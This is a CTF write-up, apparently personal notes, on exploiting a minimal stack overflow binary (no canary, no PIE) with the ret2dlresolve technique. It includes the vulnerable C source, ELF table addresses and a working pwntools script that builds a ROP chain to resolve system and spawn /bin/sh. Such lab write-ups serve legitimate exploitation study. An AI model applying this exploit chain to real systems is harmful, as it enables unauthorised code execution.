#ret2dlresolve #rop # Understanding the Challenge This binary is even smaller than the last challenge. ## Compile Options `gcc vuln.c -fno-stack-protector -no-pie -o vuln` No canary and no pie which is nice because we dont have a leak in this challenge. ## Source ```c #include <stdio.h> // gcc vuln.c -fno-stack-protector -no-pie -o vuln int main(int argc, char** argv, char** envp){ char buf[0x20]; read(0, buf, 0x1000); } ``` # The Vuln We can overflow `var_28` because we can read in 0x1000 bytes ```python read(fd: 0, buf: &var_28, nbytes: 0x1000) ``` # The Exploit We dont have anyway to leak anything like libc, we dont have a win function to rop to. We can perform a ret2dlresolve. More can be read about it [here](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve) Basically, we create a structure of a symbol of our choice that we can use to have the binary resolve that symbol, which we can then use to rop to. In this challenge, we want to resolve "system" so we can get a shell. ## JMPREL JMPRL maps an entry to a symbol JMPREL is `0x4004d8` ![[Pasted image 20210721234731.png]] ## STRTAB STRTAB is the string table STRTAB is at `0x400420` ![[Pasted image 20210721234938.png]] ## SYMTAB SYMTAB is the symbol table SYMTAB is at `0x4003c0` ![[Pasted image 20210721235025.png]] ## Resolver The resolver is the function resolves a symbol resolver is at `0x401020` ![[Pasted image 20210721235447.png]] # Solve ## pwntools ```python from pwn import * context.binary = elf = ELF('./vuln') libc = elf.libc io = elf.process() #gdb.attach(io) pop_rdi = 0x4011d3 pop_rsi_r15 = 0x4011d1 read = 0x401040 dlresolve = Ret2dlresolvePayload(elf, "system", ["/bin/sh"]) rop = ROP(elf) rop.ret2dlresolve(dlresolve) payload = b"" payload += b"A"*0x28 payload += p64(pop_rdi) payload += p64(0) payload += p64(pop_rsi_r15) payload += p64(dlresolve.data_addr) payload += p64(0) payload += p64(read) payload += rop.chain() io.sendline(payload) io.sendline(dlresolve.payload) io.interactive() ``` ## Manually TODO: another time